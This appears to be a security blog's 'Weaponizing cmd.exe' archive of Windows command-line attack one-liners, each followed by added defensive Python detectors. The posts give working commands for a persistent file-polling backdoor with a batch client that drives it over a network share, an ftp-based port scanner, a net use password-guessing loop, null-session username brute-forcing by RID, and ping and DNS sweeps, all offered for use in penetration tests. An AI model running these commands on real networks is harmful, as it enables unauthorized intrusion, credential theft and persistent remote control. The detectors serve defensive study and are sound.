Category Archives: Weaponizing cmd.exe

Discovering Domain Password Lockout Policy

Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

Here is a quick little command to discover the account lockout policy of your domain. This is useful when performing password attacks: the worst thing you could do to lose credibility is to DoS your client by locking out all of their user accounts.

C:\> net accounts /domain
The request will be processed at a domain controller for domain TEST.
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    10
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        BACKUP
The command completed successfully.

Enjoy!
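
A defender's check of the output above, as an added example that is not part of the original post: it parses the `net accounts` output shown here (embedded as constructed sample input) and compares the values with a baseline. The baseline numbers (threshold, window, duration, minimum length) are assumptions chosen for illustration, not values from the post.

```python
import re

# Constructed sample input: the `net accounts /domain` output from the post,
# embedded so the parser runs offline.
NET_ACCOUNTS_OUTPUT = """\
The request will be processed at a domain controller for domain TEST.
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    10
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        BACKUP
The command completed successfully.
"""

# Baseline values are assumptions for this example, not from the post.
DEFAULT_BASELINE = {
    "max_threshold": 10,   # more guesses than this before lockout is too lenient
    "min_window": 15,      # observation window (minutes)
    "min_duration": 15,    # lockout duration (minutes)
    "min_length": 12,      # minimum password length
}

# Each setting line is "<label>:<two or more spaces><value>"
SETTING_LINE = re.compile(r"^(.+?):\s{2,}(\S.*)$")


def parse_net_accounts(text):
    """Parse `net accounts` output into a dict keyed by the setting label.

    Numeric values become int; Never, Unlimited and None stay strings so the
    caller can test for them explicitly.
    """
    policy = {}
    for line in text.splitlines():
        m = SETTING_LINE.match(line)
        if not m:          # status lines do not have the label/value shape
            continue
        label, value = m.group(1).strip(), m.group(2).strip()
        policy[label] = int(value) if value.isdigit() else value
    return policy


def assess_lockout_policy(policy, baseline=DEFAULT_BASELINE):
    """Return a list of findings where the policy is weaker than the baseline."""
    findings = []
    threshold = policy.get("Lockout threshold")
    if not isinstance(threshold, int) or threshold == 0:
        # `net accounts` prints "Never" when no lockout threshold is configured
        findings.append("no lockout threshold: unlimited guesses per account")
    elif threshold > baseline["max_threshold"]:
        findings.append(f"lockout threshold {threshold} exceeds {baseline['max_threshold']}")
    else:
        window = policy.get("Lockout observation window (minutes)")
        if isinstance(window, int) and window < baseline["min_window"]:
            findings.append(f"observation window {window} min is below {baseline['min_window']}")
        duration = policy.get("Lockout duration (minutes)")
        # a duration of 0 means "until an administrator unlocks": stricter, not weaker
        if isinstance(duration, int) and 0 < duration < baseline["min_duration"]:
            findings.append(f"lockout duration {duration} min is below {baseline['min_duration']}")
    length = policy.get("Minimum password length")
    if isinstance(length, int) and length < baseline["min_length"]:
        findings.append(f"minimum password length {length} is below {baseline['min_length']}")
    if policy.get("Maximum password age (days)") == "Unlimited":
        findings.append("maximum password age is Unlimited: passwords never expire")
    return findings


if __name__ == "__main__":
    for finding in assess_lockout_policy(parse_net_accounts(NET_ACCOUNTS_OUTPUT)):
        print("finding:", finding)
```

Run against the post's output, the lockout settings pass the example baseline, while the zero minimum length and non-expiring passwords are reported; pipe real `net accounts` output into `parse_net_accounts` to audit your own domain.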

Weaponizing cmd.exe – Backdoor Shell

Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

When I saw this, I was very much impressed. To culminate our Weaponizing cmd.exe series, we finish up with post-exploitation processes.

Backdoor

Setting Up The Backdoor

C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

How It Works:

First, we create an infinite loop. This will make the backdoor persistent.

for /L %i in (1,0,2)

We use commands.txt for our input and iterate through it one line at a time ("delims=^" makes ^, a character that will not appear in a normal command, the only delimiter, so each whole line is treated as one object).

do (for /f "delims=^" %j in (commands.txt)

For each object found in commands.txt, execute it in a command shell, then append the results to output.txt.

do cmd.exe /c %j >> output.txt

After execution, delete commands.txt so it is clear for the next command.

& del commands.txt

We then ping ourselves twice to create a wait sequence in our infinite loop

& ping -n 2 127.0.0.1

Interacting With The Backdoor

To interact with the backdoor, we can simply echo commands into commands.txt and print out output.txt over a network share.

Execute Command:
echo <cmd> > \\<ip>\<share>\commands.txt
Read Results:
type \\<ip>\<share>\output.txt

It is pretty straightforward! You could easily create a batch file to automate writing the command, waiting for it to complete, typing out the results, and then deleting the results file. Here is a simple batch file that does it:

::cmdcat.bat <args>
::Interacts with cmd.exe backdoor
::
@ECHO OFF
:: %* passes every argument, so a command with switches arrives whole
echo %* > \\<ip>\<share>\commands.txt
:: wait for the backdoor loop to pick up and run the command
ping -n 2 127.0.0.1
type \\<ip>\<share>\output.txt
del \\<ip>\<share>\output.txt

Another implementation would be a client-like script. It would remove the need to hard code in the IP and Share information. It could just be passed initially and then the batch would wait for command input.
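
From the defender's side, the loop above has a fingerprint: a `cmd.exe` parent that spawns `ping -n 2 127.0.0.1` every second or so, forever, with `cmd.exe /c <something>` children in between. The following is an added example, not code from the original post: it runs that check over constructed process-creation events (the fields a Sysmon Event ID 1 or Security 4688 record carries, reduced to a pipe-separated line). The host names, timestamps and the line format are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events: timestamp|host|parent|command line.
# WS01 shows the backdoor loop polling (a loopback ping every second with the
# commands it ran in between); WS02 shows ordinary one-off pings.
SAMPLE_EVENTS = """\
2024-01-01T10:00:00|WS01|cmd.exe|ping -n 2 127.0.0.1
2024-01-01T10:00:01|WS01|cmd.exe|cmd.exe /c whoami
2024-01-01T10:00:01|WS01|cmd.exe|ping -n 2 127.0.0.1
2024-01-01T10:00:02|WS01|cmd.exe|ping -n 2 127.0.0.1
2024-01-01T10:00:03|WS01|cmd.exe|ping -n 2 127.0.0.1
2024-01-01T10:00:04|WS01|cmd.exe|cmd.exe /c ipconfig
2024-01-01T10:00:04|WS01|cmd.exe|ping -n 2 127.0.0.1
2024-01-01T10:05:00|WS02|explorer.exe|ping -n 1 10.0.0.5
2024-01-01T11:00:00|WS02|cmd.exe|ping -n 2 127.0.0.1
"""


def parse_events(text):
    """Split the pipe-separated sample into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        ts, host, parent, cmdline = line.split("|", 3)
        events.append({"time": datetime.fromisoformat(ts), "host": host,
                       "parent": parent, "cmdline": cmdline})
    return events


def is_loopback_ping(cmdline):
    """True for a `ping` whose target is 127.0.0.1, the loop's substitute for sleep."""
    parts = cmdline.lower().split()
    return bool(parts) and parts[0] in ("ping", "ping.exe") and "127.0.0.1" in parts


def find_ping_loops(events, max_gap=timedelta(seconds=5), min_run=5):
    """Return {host: longest run} for hosts where loopback pings repeat at
    least min_run times in a row with no more than max_gap between them.

    One sleep-by-ping is ordinary; an unbroken run of them is a polling loop
    that never exits, which is exactly what `for /L %i in (1,0,2)` produces.
    """
    by_host = defaultdict(list)
    for e in events:
        if is_loopback_ping(e["cmdline"]):
            by_host[e["host"]].append(e["time"])
    flagged = {}
    for host, times in by_host.items():
        times.sort()
        run = best = 1
        for prev, cur in zip(times, times[1:]):
            run = run + 1 if cur - prev <= max_gap else 1
            best = max(best, run)
        if best >= min_run:
            flagged[host] = best
    return flagged


def commands_run_by_loop(events, host):
    """Triage helper: the `cmd.exe /c ...` children spawned on a flagged host,
    which is the command history an operator fed the loop through commands.txt."""
    return [e["cmdline"] for e in events
            if e["host"] == host and e["parent"].lower() == "cmd.exe"
            and e["cmdline"].lower().startswith("cmd.exe /c ")]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for host, run in find_ping_loops(evs).items():
        print(host, "loopback ping run of", run, "->", commands_run_by_loop(evs, host))
```

Alongside process telemetry, the writes to commands.txt and reads of output.txt arrive over SMB, so file-share auditing on the directory the loop lives in gives a second, independent signal.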

Weaponizing cmd.exe – Port Scanning

Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

To continue, here is a nice way to port scan from the command line. This is an Ed Skoudis trick.

The problem is that the Windows telnet client handles connections poorly and is severely limited when you try to use it in scripts. The fix is to use ftp instead. It is built in to Windows, and it has some functionality that lets us overcome the limitations of the telnet client.

Port Scanner

C:\> for /L %i in (1,1,1024) do echo Checking port %i: >> ports.txt & echo open <target_ip> %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>> ports.txt

How it works

Create a basic loop for the range of ports you want to scan

for /L %i in (1,1,1024)

Echo out a message indicating which port is being scanned, and append it to a file called ports.txt

do echo Checking port %i: >> ports.txt

Now echo the ftp command "open <ip> <port>" into a file called ftp.txt

& echo open <target_ip> %i > ftp.txt

Append the FTP command "quit" to that same file

& echo quit >> ftp.txt

Open the ftp client, using the text within ftp.txt as its list of commands. This does the actual scan attempt.

& ftp -s:ftp.txt

Redirect standard error into the ports.txt file. This is where the results go: the error message returned by the connection attempt tells you whether the port is open.

2>> ports.txt

Truly clever. Hats off to Ed Skoudis.

Weaponizing cmd.exe – UN/PW Guessing

Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

This is a fantastic way to automate a dictionary attack against Windows accounts using net use. This is part of my salute to Pentesting Ninjitsu.

UN/PW Guessing

for /f %i in (knownUsers.txt) do @(for /f %j in (passwordList.txt) do @echo %i:%j & @net use \\<ip> %j /u:%i 2> nul && echo %i:%j >> successfulLogins.txt && net use \\<ip> /del)

How it works

This looks messy, but this is how it works:
  • Create a for loop that iterates over items (note: not a /L loop) in knownUsers.txt, the list of users
for /f %i in (knownUsers.txt)
  • For each user in the list, run another for loop that iterates through the list of passwords in passwordList.txt
do @(for /f %j in (passwordList.txt)
  • Print out the username:password combination being tested
do @echo %i:%j
  • For each of those passwords, try to establish a session using the currently selected password for the currently selected user
& @net use \\<ip> %j /u:%i
  • All errors (failed logins) are discarded
2> nul
  • If and ONLY if the command succeeds, append the username:password combo to successfulLogins.txt
&& echo %i:%j >> successfulLogins.txt
  • Again, if that login was successful, we now need to destroy that session to be able to keep testing
&& net use \\<ip> /del)

This is a fantastic tool. Have fun!
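
Every failed `net use` in the loop above lands in the target's Security log as a logon failure (event 4625), so the same loop is easy to see from the other side. The following is an added example, not code from the original post: it groups constructed 4625 records (reduced to timestamp|event id|source address|target user|substatus) by source address, finds the busiest window, and reports which accounts are one attempt away from the lockout threshold discussed in the first post. The addresses, user names and line format are assumptions; the substatus codes 0xC000006A (wrong password) and 0xC0000234 (account locked out) are the real Windows values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security log logon failures:
# timestamp|event id|source address|target user|substatus
SAMPLE_4625 = """\
2024-01-01T09:00:00|4625|10.0.0.9|alice|0xC000006A
2024-01-01T09:00:01|4625|10.0.0.9|alice|0xC000006A
2024-01-01T09:00:02|4625|10.0.0.9|alice|0xC000006A
2024-01-01T09:00:03|4625|10.0.0.9|bob|0xC000006A
2024-01-01T09:00:04|4625|10.0.0.9|bob|0xC000006A
2024-01-01T09:00:05|4625|10.0.0.9|bob|0xC000006A
2024-01-01T09:30:00|4625|10.0.0.20|carol|0xC000006A
2024-01-01T11:00:00|4625|10.0.0.9|dave|0xC000006A
"""


def parse_failures(text):
    """Return (time, source, user, substatus) tuples for the 4625 records."""
    rows = []
    for line in text.splitlines():
        ts, event_id, src, user, status = line.split("|")
        if event_id == "4625":
            rows.append((datetime.fromisoformat(ts), src, user, status))
    return rows


def max_in_window(times, window):
    """Largest number of timestamps that fall inside any span of `window`
    (two-pointer sweep over the sorted times)."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_guessing(rows, window=timedelta(minutes=30), min_failures=5,
                    lockout_threshold=10):
    """Per source address: failures in its busiest window, the users tried,
    and the users whose next failure would trip the lockout threshold.

    A source is reported when its busiest window holds at least min_failures.
    The per-user view is the early warning that guessing is about to lock
    accounts, or that the guesser is deliberately stopping just short.
    """
    by_src = defaultdict(list)
    for t, src, user, _status in rows:
        by_src[src].append((t, user))
    report = {}
    for src, items in by_src.items():
        peak = max_in_window([t for t, _ in items], window)
        if peak < min_failures:
            continue
        per_user = defaultdict(int)
        for _, user in items:
            per_user[user] += 1
        at_risk = sorted(u for u, n in per_user.items() if n >= lockout_threshold - 1)
        report[src] = {"peak_failures": peak, "users": sorted(per_user),
                       "at_risk": at_risk}
    return report


if __name__ == "__main__":
    for src, info in detect_guessing(parse_failures(SAMPLE_4625)).items():
        print(src, info)
```

The window and threshold parameters are meant to be set from the domain's actual `net accounts` values, so that the alert fires before the lockout does rather than after.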

Weaponizing cmd.exe – Enumerate users (in spite of RestrictAnonymous)

Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

Okay. Continuing on with the series. Now that we have mapped the network, we need to enumerate users on the active hosts. Often you will be performing a penetration test on a Windows machine. In the event that the machine has RestrictAnonymous set, you may find it difficult to enumerate users using your null session. It is important to note that this does not make it impossible! Tools like enum rely upon the null session enumeration option, therefore RestrictAnonymous = 2 ruins the use of that tool (and others like it). I am going to show you a method to brute force usernames in a different manner. For this you will need two tools, sid2user and user2sid. You can get them here.

Step 1: Establish a Null Session

C:\> net use \\<target_ip> "" /u:""

It is important to note that although RestrictAnonymous is set to 2, that does not prevent null sessions. It simply prevents the enumeration of users via null sessions.

Step 2: Determine Target Machine’s name

There are many methods to get this. Here is one:

C:\> nbtstat -a <target_ip>

Step 3: Acquire SID

C:\> user2sid \\<target_ip> <machine_name>

This will return the machine's SID (Security Identifier). The SID is a unique number for each user/system. It has the following format:

S-[Revision-Level]-[Authority Level]-[Domain-or-Computer-number]-[RID]

Example (brackets added for clarity): S-[1]-[5-21]-[165875785-1005667432-441284377]-[1023]

The RID is the number which represents the user ID. We use this to get their usernames.

Step 4: Acquire Admin account name

RID 500 is the built-in administrator account, which lets us identify the true admin even if the account has been renamed. Knowing that, you can manually determine the admin using sid2user.

C:\> sid2user \\<target_ip> <SID_with_RID_set_to_500>

For example, the SID with the RID set to 500 would look like:

S-1-5-21-165875785-1005667432-441284377-500

Step 5: Acquire Other Users

C:\> for /L %u in (1000,1,1015) do @sid2user \\<target_ip> <SID_without_RID> %u

This loop will brute force usernames by retrieving the usernames associated with RIDs 1000-1015. You can change this according to your needs.

There you go! Now you can go on to password cracking, etc.
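
The SID layout described in Step 3 turns up constantly in log triage (4625, 4720 and similar events carry SIDs rather than names), and the RID-500 rule is how a defender confirms which account is really the administrator when an attacker or an admin has renamed it. The following is an added example, not code from the original post: a parser for domain/machine SIDs that uses the post's own sample SID as constructed input, reconstructs the RID-500 SID from Step 4, and labels a few well-known RIDs. The list of well-known RIDs is a small selection of real values, not from the post.

```python
import re

# Domain and machine SIDs have the shape the post describes:
# S-<revision>-<identifier authority>-<subauthorities...>-<RID>.
# The post's sample SID is used here as constructed sample input.
SAMPLE_SID = "S-1-5-21-165875785-1005667432-441284377-1023"

# RIDs with a fixed meaning; the account name can be changed, the RID cannot.
WELL_KNOWN_RIDS = {
    500: "Administrator (built-in)",
    501: "Guest (built-in)",
    512: "Domain Admins",
    513: "Domain Users",
}

SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")


def parse_sid(sid):
    """Split a SID string into its parts.

    Raises ValueError unless it is a domain or local machine SID with a RID
    (S-1-5-21-a-b-c-RID), the only kind the RID trick in the post applies to.
    The post's "[5-21]" grouping is the identifier authority 5 followed by 21,
    the first subauthority, which marks a domain/machine SID.
    """
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(m.group(1)), int(m.group(2))
    subs = [int(x) for x in m.group(3).lstrip("-").split("-")]
    if revision != 1 or authority != 5 or len(subs) != 5 or subs[0] != 21:
        raise ValueError(f"not a domain/machine SID with RID: {sid!r}")
    domain_sid = "S-%d-%d-%s" % (revision, authority,
                                 "-".join(str(s) for s in subs[:-1]))
    return {"revision": revision, "authority": authority,
            "domain_sid": domain_sid, "rid": subs[-1]}


def with_rid(domain_sid, rid):
    """Attach a RID to a domain SID, e.g. to name RID 500 regardless of renames."""
    return f"{domain_sid}-{rid}"


def describe_rid(rid):
    """Well-known RIDs map to fixed principals; 1000 and above are ordinary
    user and group accounts created on the domain or machine."""
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    if rid >= 1000:
        return "user/group created on this domain or machine"
    return "other built-in principal"


if __name__ == "__main__":
    parts = parse_sid(SAMPLE_SID)
    print("domain SID:", parts["domain_sid"], "RID:", parts["rid"], describe_rid(parts["rid"]))
    print("administrator SID:", with_rid(parts["domain_sid"], 500))
```

Feeding the post's sample through `parse_sid` and `with_rid(..., 500)` yields exactly the RID-500 SID shown in Step 4; the same two calls applied to the SIDs in your own audit logs tell you whether a renamed account is the built-in administrator.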

Weaponizing cmd.exe – DNS Reverse Lookup

Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

Continuing on with the “Weaponizing cmd.exe” series, we have already enumerated live hosts. Now let's get some more information using DNS reverse lookup. We use the nslookup <ip> command to do it.

DNS Reverse Lookup

for /L %i in (1,1,255) do @nslookup x.x.x.%i 2> nul | find "Name" && @echo x.x.x.%i

How it works
  • Do a for loop, using an integer that is initialized to 1 and incremented by 1 until it equals 255
for /L %i in (1,1,255)
  • For each iteration, do a DNS reverse lookup for the next address on the subnet
do @nslookup x.x.x.%i
  • If I get an error, discard the results
2> nul
  • With all other results, output the line containing “Name”
| find "Name"
  • If and only if the lookup returns without errors, print the IP of the machine
&& @echo x.x.x.%i

It's pretty nice for enumeration. Have fun!

Weaponizing cmd.exe – Ping Sweep

Filed under Fu (a.k.a Tips), Weaponizing cmd.exe

This is part of my tribute to PenTesting Ninjitsu. Here is a nice quick way to perform a ping sweep from the Windows command line.

Ping Sweep

for /L %i in (1,1,255) do @ping -n 1 x.x.x.%i | find "Reply"

How it works

This command is built in the following way:
  • Create a loop using a variable called %i
for /L %i
  • The loop should iterate %i by first initializing it to 1, then incrementing it by 1 until it hits 255
%i in (1,1,255)
  • The action performed is to send 1 ping request to the IP address whose last octet equals the value of %i (@ makes sure the command isn't echoed back)
do @ping -n 1 x.x.x.%i
  • I only want the result lines that contain a reply message, indicating an active host (find is case sensitive)
| find "Reply"

The results will show you the lines of ping output containing the IP of each live host on the subnet, e.g.

Reply from 192.168.1.2: bytes=32 time<1ms TTL=128
Reply from 192.168.1.15: bytes=32 time<1ms TTL=128
Reply from 192.168.1.117: bytes=32 time<1ms TTL=128

Enjoy!
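
Both the ftp port scanner from the Port Scanning post and the ping sweep above walk their target space in steps of one (`for /L ... (1,1,1024)` over ports, `(1,1,255)` over the last octet), which is what a network defender looks for in firewall logs. The following is an added example serving both posts, not code from the original: it builds constructed firewall log lines (timestamp|proto|src|dst|dport|action, made-up 10.0.0.0/24 addresses) and runs two detectors over them, one for many distinct ports from one source to one host, one for ICMP echo to many distinct hosts, each also reporting the longest consecutive run as the loop's fingerprint. The thresholds and line format are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_log():
    """Constructed firewall log: a TCP sweep of ports 1-40 against one host,
    an ICMP echo sweep across 10.0.0.1-30, and a little benign traffic."""
    base = datetime(2024, 1, 1, 12, 0, 0)
    lines = []
    for port in range(1, 41):       # the ftp -s loop: one connect per port
        ts = (base + timedelta(seconds=port)).isoformat()
        lines.append(f"{ts}|tcp|10.0.0.9|10.0.0.50|{port}|deny")
    for host in range(1, 31):       # the ping -n 1 loop: one echo per address
        ts = (base + timedelta(minutes=5, seconds=host)).isoformat()
        lines.append(f"{ts}|icmp|10.0.0.9|10.0.0.{host}|0|allow")
    lines.append(f"{base.isoformat()}|tcp|10.0.0.7|10.0.0.50|445|allow")
    lines.append(f"{base.isoformat()}|icmp|10.0.0.7|10.0.0.50|0|allow")
    return "\n".join(lines)


def parse_log(text):
    """Split the pipe-separated lines into dicts; dport is 0 for ICMP."""
    rows = []
    for line in text.splitlines():
        ts, proto, src, dst, dport, action = line.split("|")
        rows.append({"time": datetime.fromisoformat(ts), "proto": proto,
                     "src": src, "dst": dst, "dport": int(dport), "action": action})
    return rows


def longest_consecutive_run(values):
    """Length of the longest run of consecutive integers in values. The
    for /L loops step ports or octets by one, so a long run is their
    fingerprint, as opposed to the scatter of normal traffic."""
    best = run = 0
    prev = None
    for v in sorted(set(values)):
        run = run + 1 if prev is not None and v == prev + 1 else 1
        best = max(best, run)
        prev = v
    return best


def port_scan_sources(rows, min_ports=20):
    """{(src, dst): {"ports": n, "run": k}} for pairs where one source touched
    at least min_ports distinct TCP ports on one destination."""
    ports = defaultdict(set)
    for r in rows:
        if r["proto"] == "tcp":
            ports[(r["src"], r["dst"])].add(r["dport"])
    return {pair: {"ports": len(p), "run": longest_consecutive_run(p)}
            for pair, p in ports.items() if len(p) >= min_ports}


def ping_sweep_sources(rows, min_hosts=20):
    """{src: {"hosts": n, "run": k}} for sources that sent ICMP to at least
    min_hosts distinct addresses; the run is measured over the last octet."""
    hosts = defaultdict(set)
    for r in rows:
        if r["proto"] == "icmp":
            hosts[r["src"]].add(r["dst"])
    return {src: {"hosts": len(h),
                  "run": longest_consecutive_run(int(d.rsplit(".", 1)[1]) for d in h)}
            for src, h in hosts.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    rows = parse_log(build_sample_log())
    print("port scans:", port_scan_sources(rows))
    print("ping sweeps:", ping_sweep_sources(rows))
```

A denied connect per port (the scan) and an allowed echo per host (the sweep) both show up here; the reverse-lookup loop from the DNS post leaves the same shape in DNS server logs, a run of PTR queries over consecutive addresses, and the same `longest_consecutive_run` applies to it.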
